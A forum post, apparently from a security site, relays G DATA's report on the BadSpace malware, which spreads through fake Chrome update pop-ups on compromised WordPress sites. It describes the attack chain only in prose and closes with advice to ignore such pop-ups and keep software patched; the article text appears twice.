Tomcat
Professional
- Messages
- 2,689
- Reaction score
- 949
- Points
- 113
The malware campaign is clearly inspired by the recently discovered FakeUpdates malware family.
Computer systems around the world are being attacked using a new malware called BadSpace, which is distributed under the guise of fake Chrome browser updates.
According to the German cybersecurity company G DATA, attackers use a multi-stage attack, including an infected website, a management server, a fake browser update, and a JScript downloader to install malware on the victim's system.
Researchers kevross33 and Gi7w0rm were the first to report details of this malware last month. The attack starts with a compromised website, including one created on the WordPress platform, which injects code to check whether the user has visited the site before. If this is the first session, the code collects information about the device, IP address, user agent, and location, transmitting it to a hard-coded domain via an HTTP request.
The server response overlays the web page content with a fake Google Chrome update window that either downloads malware directly, or a JavaScript loader that then downloads and executes BadSpace.
BadSpace attack scheme
Analysis of the management servers used in this campaign revealed links to the well-known SocGholish malware, also known as FakeUpdates. This is a JavaScript loader distributed in a similar way.
BadSpace has sandbox traversal features and maintains persistence in the system through scheduled tasks. It can collect system information, execute commands to create screenshots, execute instructions from the command line, read and write files, and delete scheduled tasks.
In addition to G DATA, eSentire and Sucuri have also warned over the past month about various campaigns that use false browser updates on infected sites to spread information about data theft and deleted Trojans.
The situation with BadSpace clearly demonstrates how sophisticated and multi-stage modern cyber attacks can be. Attackers invest considerable effort in disguising malicious code as legitimate updates and exploit users trust in well-known brands.
If there is the slightest doubt about the origin of such "windows with updates", do not interact with them. The browsers installed in the system are perfectly updated without user intervention.
In addition, it is not superfluous to timely apply legitimate updates to the operating system, antivirus software and other installed software in order to prevent the appearance of a digital loophole for hackers to penetrate.
Computer systems around the world are being attacked using a new malware called BadSpace, which is distributed under the guise of fake Chrome browser updates.
According to the German cybersecurity company G DATA, attackers use a multi-stage attack, including an infected website, a management server, a fake browser update, and a JScript downloader to install malware on the victim's system.
Researchers kevross33 and Gi7w0rm were the first to report details of this malware last month. The attack starts with a compromised website, including one created on the WordPress platform, which injects code to check whether the user has visited the site before. If this is the first session, the code collects information about the device, IP address, user agent, and location, transmitting it to a hard-coded domain via an HTTP request.
The server response overlays the web page content with a fake Google Chrome update window that either downloads malware directly, or a JavaScript loader that then downloads and executes BadSpace.
BadSpace attack scheme
Analysis of the management servers used in this campaign revealed links to the well-known SocGholish malware, also known as FakeUpdates. This is a JavaScript loader distributed in a similar way.
BadSpace has sandbox traversal features and maintains persistence in the system through scheduled tasks. It can collect system information, execute commands to create screenshots, execute instructions from the command line, read and write files, and delete scheduled tasks.
In addition to G DATA, eSentire and Sucuri have also warned over the past month about various campaigns that use false browser updates on infected sites to spread information about data theft and deleted Trojans.
The situation with BadSpace clearly demonstrates how sophisticated and multi-stage modern cyber attacks can be. Attackers invest considerable effort in disguising malicious code as legitimate updates and exploit users trust in well-known brands.
If there is the slightest doubt about the origin of such "windows with updates", do not interact with them. The browsers installed in the system are perfectly updated without user intervention.
In addition, it is not superfluous to timely apply legitimate updates to the operating system, antivirus software and other installed software in order to prevent the appearance of a digital loophole for hackers to penetrate.
